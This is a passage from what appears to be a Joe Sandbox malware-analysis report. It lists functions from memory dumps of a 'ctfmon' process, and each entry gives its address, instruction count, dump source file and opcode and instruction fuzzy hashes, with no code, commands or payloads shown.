                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40f2f4bae09e74c257b1efc4f08f26e7418f8dc495c52743ec59e488ccdd3517
                                                    • Instruction ID: 5e1ff507f6d95382fcf16a41d2a6210920c7b29c8fb4a1afb6e95c6c37e59727
                                                    • Opcode Fuzzy Hash: 40f2f4bae09e74c257b1efc4f08f26e7418f8dc495c52743ec59e488ccdd3517
                                                    • Instruction Fuzzy Hash: DB318572F0990B5FDB58DA58D4A15A8F3B1FF85350B118239D06ED3696DF247C128B84
                                                    Function 00007FFD9C1D4E05 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24925f4a9b91acdd445b037dc1f46b0a498eff6bfec710975771d202f98f5e6a
                                                    • Instruction ID: d98d7ab96dec0c9374eac76f399eb54fef9ead66a67c03616769966da63bd8b9
                                                    • Opcode Fuzzy Hash: 24925f4a9b91acdd445b037dc1f46b0a498eff6bfec710975771d202f98f5e6a
                                                    • Instruction Fuzzy Hash: DA315C32E0850BEFEBB8DB9484A15BDB7B1FF84340F504276D00EE6581EB3D68008759
                                                    Function 00007FFD9C1DE28B Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 59795aada0f1066d06301603413935132606f0ad40806ebbeee85cde33bf43d4
                                                    • Instruction ID: 2e423b91303eb0a0a643ee20c877aa074b3170c3e516246719973c2aaa295795
                                                    • Opcode Fuzzy Hash: 59795aada0f1066d06301603413935132606f0ad40806ebbeee85cde33bf43d4
                                                    • Instruction Fuzzy Hash: 6E310D72F1891B9FDB64DB58C4A15B8B3B2FF58391B514239D05AE3681DF24BC12CB84
                                                    Function 00007FFD9C1DE345 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb2243a1b191d325c20f7cc9f775bce074aae87d354543c41d859f183676ae6f
                                                    • Instruction ID: 8a54c9ad28cf6b2c3877fbed33092c84cf991766898e909c53e87ce52487e9e8
                                                    • Opcode Fuzzy Hash: cb2243a1b191d325c20f7cc9f775bce074aae87d354543c41d859f183676ae6f
                                                    • Instruction Fuzzy Hash: 6C31F473F0CA474FEB68A7A848722B8B7E1EF55391F15437AD01DD22C2EE1868018384
                                                    Function 00007FFD9C1D221A Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1095468e4963f0575e21f24ad6bb98ae726ca1dbe231adf6197c3caff43c74bb
                                                    • Instruction ID: 71430757ca7e90d76174a57064c6b1f1227d719da9ddf5325193dcc39ad31d3d
                                                    • Opcode Fuzzy Hash: 1095468e4963f0575e21f24ad6bb98ae726ca1dbe231adf6197c3caff43c74bb
                                                    • Instruction Fuzzy Hash: C131B963F1D94B4FE76996A844712A8B3E1FF54360F140379E06ED61C3FE186C018684
                                                    Function 00007FFD9C1DD905 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e36691ac3c84e7bc94cd6a31fd44179e194a0c1b0759a131d2a2c3dd77081ab
                                                    • Instruction ID: 2e1c3f2f3b7180e66ac9cc861fd6db23fe7b5d276f6496f682f0e6088f6a577a
                                                    • Opcode Fuzzy Hash: 6e36691ac3c84e7bc94cd6a31fd44179e194a0c1b0759a131d2a2c3dd77081ab
                                                    • Instruction Fuzzy Hash: 58318E32E1C65ECFDB58EFA4C8606AD7BB1FF59300F4102BAD00AE7291DA356801CB55
                                                    Function 00007FFD9BAE7345 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 280df960721aac0100b412d644d5e353ca5db0688c040ffdd13d21ea5b334cfd
                                                    • Instruction ID: c4d8bc88aff45030e878b36d27f5c32f7e15fc816c2ca04c90d05099de058419
                                                    • Opcode Fuzzy Hash: 280df960721aac0100b412d644d5e353ca5db0688c040ffdd13d21ea5b334cfd
                                                    • Instruction Fuzzy Hash: C631D13195A28D8FDB51EF6488686ED7FB0FF05304F4144FBE818C71A6EA789658CB02
                                                    Function 00007FFD9C1E0F05 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5a0959803b8aec1c0bb714f5182661a3e33c7961841f354a50e3d28bedeec08
                                                    • Instruction ID: 1d2b2bab7939aadab09a4b2d2685efb91245d52c49f2cc5dece7ff812e13e019
                                                    • Opcode Fuzzy Hash: f5a0959803b8aec1c0bb714f5182661a3e33c7961841f354a50e3d28bedeec08
                                                    • Instruction Fuzzy Hash: AA314132E0890FCFDBA8DB9485655BD77B0FF44340F9041BAD40EE31A1DB39A920AB85
                                                    Function 00007FFD9C1D3CF0 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 34ef0737a45f3565104dfd6e7fbd48c82ba17301df03e7cf385ec93d83d17f3d
                                                    • Instruction ID: ea377af2909bfd623e214391f4c3888048cbd2c01d89cdc7d42577afe6fb20a5
                                                    • Opcode Fuzzy Hash: 34ef0737a45f3565104dfd6e7fbd48c82ba17301df03e7cf385ec93d83d17f3d
                                                    • Instruction Fuzzy Hash: 78316926F1CA974AE33A871844745707F70EF96310B9847BAC08ADF4CBE42CB8819B45
                                                    Function 00007FFD9BAE785D Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c85d5c88922b9092659766e2704c87b4c19561089c8d2022a770a6bf3a8d778f
                                                    • Instruction ID: 8cff6a371f72664fed6d362139e85d47462eadcf0d0be4806028e1fa27eb659a
                                                    • Opcode Fuzzy Hash: c85d5c88922b9092659766e2704c87b4c19561089c8d2022a770a6bf3a8d778f
                                                    • Instruction Fuzzy Hash: 1C214831D4DA8C8FDB11EF99D8141E97BA0FF5A320F02027AE45CC3282DB799669C752
                                                    Function 00007FFD9C1DFDF0 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a6da97bd4d505431f6dd2abe657bc0a63b5d4e3e1d9ac2567fd672b21155033
                                                    • Instruction ID: e762e09b44faa0d78c3a48e45a936e20b843141b1470deaa6aa87d06816998aa
                                                    • Opcode Fuzzy Hash: 8a6da97bd4d505431f6dd2abe657bc0a63b5d4e3e1d9ac2567fd672b21155033
                                                    • Instruction Fuzzy Hash: 91313612E1C59B8EE33A875C48705B47BA1EF92340B1947BAD08ADB4D7E82CAA81C345
                                                    Function 00007FFD9C1D10F2 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5665e6ee29bfbb2531ee23723eba3e22c0fd1ec1b541772f833d255c25ba4e2
                                                    • Instruction ID: 5c5d45fd468c0f8f812eef5f94cf45303fb07f5a683a14a304ba81ebc1f4746a
                                                    • Opcode Fuzzy Hash: c5665e6ee29bfbb2531ee23723eba3e22c0fd1ec1b541772f833d255c25ba4e2
                                                    • Instruction Fuzzy Hash: 07210A31E1891D8FDF9CEB58C4A5AEDB7B1FF58310F1002AAD01EE3295DA35A941CB44
                                                    Function 00007FFD9C1DDCE2 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57fac0a751f2fd51c71b228c74cd4ec23db0d09e8a62aae86b90e7b547ceca9b
                                                    • Instruction ID: 1b05bd98fcfd855fe6c6381266240f514aa8e4554e860a57f756ee651cc902c8
                                                    • Opcode Fuzzy Hash: 57fac0a751f2fd51c71b228c74cd4ec23db0d09e8a62aae86b90e7b547ceca9b
                                                    • Instruction Fuzzy Hash: 1021FA31E0891D9FDF98EF58C465AECB7B1FF58314F0002AAD00EE3291DA35A941CB44
                                                    Function 00007FFD9C1DC213 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeaafd2093c4e0cfd462baebdd99a54959f19e5be51e1631594cda204f5132ba
                                                    • Instruction ID: bbc2d689f824c28635d0dfefdf6e69737a8c80ea968a21e9360928d58d8675b9
                                                    • Opcode Fuzzy Hash: aeaafd2093c4e0cfd462baebdd99a54959f19e5be51e1631594cda204f5132ba
                                                    • Instruction Fuzzy Hash: E621A132F0861A8FEBA8EA98D865678B3F1FF49355F04067AD04FD3592DE256C418B84
                                                    Function 00007FFD9C1DC277 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac0faa19ceb78677b1ab92e1f0bbb92f3369ec7ed509111352e4dd19e499192e
                                                    • Instruction ID: d78d21a46b2de15ba0c6353901495c4bf34de538f69ec067e2e3f227feadc4a2
                                                    • Opcode Fuzzy Hash: ac0faa19ceb78677b1ab92e1f0bbb92f3369ec7ed509111352e4dd19e499192e
                                                    • Instruction Fuzzy Hash: 77114231B086188FDB58DF58D895AA8B3F1FF59315F1042AAD04ED72A6DE31AC418B44
                                                    Function 00007FFD9C1D0DCA Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7eb6b492fa81c7c0fb48521809a97143fcb87ed51991336629bafa135d506d3
                                                    • Instruction ID: 5d57d6af3055a9e7f929114d4bbc717daccfb99906dad91dd0186e5f34cadc14
                                                    • Opcode Fuzzy Hash: d7eb6b492fa81c7c0fb48521809a97143fcb87ed51991336629bafa135d506d3
                                                    • Instruction Fuzzy Hash: 6E21F913E0E2C38BE33642B458705B97F605F82360F5807FAD089960E7EC4C1555D386
                                                    Function 00007FFD9C1D3D20 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 940dd039688e46af1e2aae23ea3f74aa8d4f023b68f759a529bd9922b6158e7d
                                                    • Instruction ID: 27234a7789e19890aede625d7e617ae30017fb987824c809e2ecf7ff3b60e16d
                                                    • Opcode Fuzzy Hash: 940dd039688e46af1e2aae23ea3f74aa8d4f023b68f759a529bd9922b6158e7d
                                                    • Instruction Fuzzy Hash: 01112B36F1CD2B8AF63C8A4C50745B47671EF98354BE44775C04BDB48AD83CB8819B88
                                                    Function 00007FFD9C1DD9E1 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d7b1580d26026962720fe43b268615c19e90557a2b7fcc4e61300217b06a5af
                                                    • Instruction ID: 1a8fa698cfadb4b8ab4afaaa208ed57e2ac2867a2cbb40643d14779fcbbbb6eb
                                                    • Opcode Fuzzy Hash: 9d7b1580d26026962720fe43b268615c19e90557a2b7fcc4e61300217b06a5af
                                                    • Instruction Fuzzy Hash: BF119D13F0E5939BF63866E418316BD26705F45BE0F5583FBE44EE62C6EC4C384192AA
                                                    Function 00007FFD9C1DC21C Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0188f2be78bb058667bfa196408087d6ed3363901c62ec6dda0eb7c9b552fd32
                                                    • Instruction ID: a59ba2456546bcf0bb5342da8a246fbbec4d43b9683b9cac2fa78c5c68688d62
                                                    • Opcode Fuzzy Hash: 0188f2be78bb058667bfa196408087d6ed3363901c62ec6dda0eb7c9b552fd32
                                                    • Instruction Fuzzy Hash: 24119132F086098FEB58DA58D8A9AB8B3F1EF59315F00027AD04ED36A2DE2168418B44
                                                    Function 00007FFD9C1D81D8 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbcf88790e7a009d3e52e59200291f04eddd51ab18babf373126e3e7d04acbbc
                                                    • Instruction ID: c0f67f0147d022994af1c61cc0ac82ca0b933558d9430bfb71e55e4e1ce7a8fa
                                                    • Opcode Fuzzy Hash: dbcf88790e7a009d3e52e59200291f04eddd51ab18babf373126e3e7d04acbbc
                                                    • Instruction Fuzzy Hash: 9311E572F0864F4BFB7496A444686BE3AE5DF553C2F06063AE00AF7191EE647C418299
                                                    Function 00007FFD9C41B4F9 Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a9feb82b83057ad41e4c34b462aed6f176d1714b81dd9ee4b2c77db36a9f59b
                                                    • Instruction ID: 2bf106014b39cd3d02afbe451d3a6e4d849af8efc5846d8a464345adcf36b0e2
                                                    • Opcode Fuzzy Hash: 5a9feb82b83057ad41e4c34b462aed6f176d1714b81dd9ee4b2c77db36a9f59b
                                                    • Instruction Fuzzy Hash: 052129B0A0878D8FCB49DF68C8955A97BF1FF68304F05066AE889D7291DB34E950CB81
                                                    Function 00007FFD9C419C09 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 648b24123b5d7b6e6a620c14714c4574f4a0aa2ad126f7efa541a1d605933485
                                                    • Instruction ID: bd5b78753b6259b3d68020a914b046dc1c1c0b5e33861d1964854ac4fa85ed14
                                                    • Opcode Fuzzy Hash: 648b24123b5d7b6e6a620c14714c4574f4a0aa2ad126f7efa541a1d605933485
                                                    • Instruction Fuzzy Hash: 95112B70908A4D8FDF85EF58C8599E97BF0FF28305F0501AAD448D72A1D734E584CB81
                                                    Function 00007FFD9C1D498C Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce2ed485ffaac7092301ef1f05e1b7f5265cd20138e00a45215219359f57b2ef
                                                    • Instruction ID: ffd892fa700974abe0aa1519e84835c74fba310557a43db662bf590e46787c69
                                                    • Opcode Fuzzy Hash: ce2ed485ffaac7092301ef1f05e1b7f5265cd20138e00a45215219359f57b2ef
                                                    • Instruction Fuzzy Hash: 4E118831A087078FD314CF14C0A06F0B3F0FF10320B41063ED48687A96EB687842CB94
                                                    Function 00007FFD9C1E0A8C Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a9e5245fa6b83271baaf77257f754be191a3edb9b5b40408be01a5980c83f08
                                                    • Instruction ID: 434b42ce676a9ff1d9816a124562b6753891d7297483f6d77f2a5286f206b75c
                                                    • Opcode Fuzzy Hash: 5a9e5245fa6b83271baaf77257f754be191a3edb9b5b40408be01a5980c83f08
                                                    • Instruction Fuzzy Hash: CE1121326487078FD365DA24D4A06A1B3F0FF11360B9046BAC486C7AA6DB69B842CB80
                                                    Function 00007FFD9C413090 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26a38efc215bf31128917e7a72287791dbd543770e468fc4abe03a22e1c0bfc6
                                                    • Instruction ID: d6b5ac152347c98b4adfad764ac12090533ea4fd67e30bff98e8a296946bec79
                                                    • Opcode Fuzzy Hash: 26a38efc215bf31128917e7a72287791dbd543770e468fc4abe03a22e1c0bfc6
                                                    • Instruction Fuzzy Hash: BA01803190891E8FDF94EF68C858AEAB7F0FF68305F0405AAE41CD7191DB30A590CB80
                                                    Function 00007FFD9C4175D9 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c2f561a55cb62089d923b952abe9f11bff42b6de8d5fb9e04d70485a226ac4
                                                    • Instruction ID: afbee64094a4f67ab5a64c0215975e64f1fce3d2fd5ea7b71b5d288575357e58
                                                    • Opcode Fuzzy Hash: d7c2f561a55cb62089d923b952abe9f11bff42b6de8d5fb9e04d70485a226ac4
                                                    • Instruction Fuzzy Hash: 46112D70908A8D8FDF85EF68C859AAA7FF0FF64304F0505ABD458D71A2DB74A554CB80
                                                    Function 00007FFD9C411450 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a43992373088c2c48a6bae902bd627414f05ceac60cc884833d1f50b888dc81
                                                    • Instruction ID: 9372e926dcc50e3460efbe09fc74a38a04d34903312e4e82cc8827d0622aa6eb
                                                    • Opcode Fuzzy Hash: 7a43992373088c2c48a6bae902bd627414f05ceac60cc884833d1f50b888dc81
                                                    • Instruction Fuzzy Hash: 03F0D13098E2CA2FD713A7B44C651E87FB0EF12304F0945E3D498C6093C6286259C752
                                                    Function 00007FFD9C413D10 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a5436ce86a9096d446b9e4363fbb67313569c01f31537b8cd0e911a443527ae
                                                    • Instruction ID: 50b2e7047b6f9707ce1487abdf23ac9ea3aa0028d18fc73017d5d503925893a3
                                                    • Opcode Fuzzy Hash: 1a5436ce86a9096d446b9e4363fbb67313569c01f31537b8cd0e911a443527ae
                                                    • Instruction Fuzzy Hash: 4F01717054E7CA4FD7179B644C611E57FB0AF17204F0905E7D4D8C7093C62C6969C792
                                                    Function 00007FFD9C411839 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bb153e543b13854c17d009fbbab9635d3e8882939227c19946f02616fb3de96a
                                                    • Instruction ID: 81f9903e3f62e06df8379e7880721f04b5e08519f44c5df77ab4bdc293f76129
                                                    • Opcode Fuzzy Hash: bb153e543b13854c17d009fbbab9635d3e8882939227c19946f02616fb3de96a
                                                    • Instruction Fuzzy Hash: 03014C70A0968D8FCF85DF58C8586EA7BB0FF64304F0445AAD458C72A1DB74E954CB80
                                                    Function 00007FFD9C4130A8 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ecabe2eda215fd694cf7c5cda30c4047fc0827e4530587265faa7727eef0243
                                                    • Instruction ID: 507b9a157c5d52f1ef5f934df6ea46ce9566c458a6b3b1878b0865d0d11f1289
                                                    • Opcode Fuzzy Hash: 1ecabe2eda215fd694cf7c5cda30c4047fc0827e4530587265faa7727eef0243
                                                    • Instruction Fuzzy Hash: D4016B7091490E9FDF94EF58C858AAEB7F0FB68305F10456AA41DD3254DB71A694CB80
                                                    Function 00007FFD9C1DB9ED Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6733af3c5741cd10a5af96c8f5ca482c29bd9f7fa177a35cc45b8e4406087d4c
                                                    • Instruction ID: 59b21789fadf0e63eced7f15be33ddb351c229ce575cecaca6af9d8a91458235
                                                    • Opcode Fuzzy Hash: 6733af3c5741cd10a5af96c8f5ca482c29bd9f7fa177a35cc45b8e4406087d4c
                                                    • Instruction Fuzzy Hash: FAF0D622E0D54B8FD77896A884715B437A0EF54360B0103F7D04FDA6D2FD18A8808745
                                                    Function 00007FFD9BAE9420 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
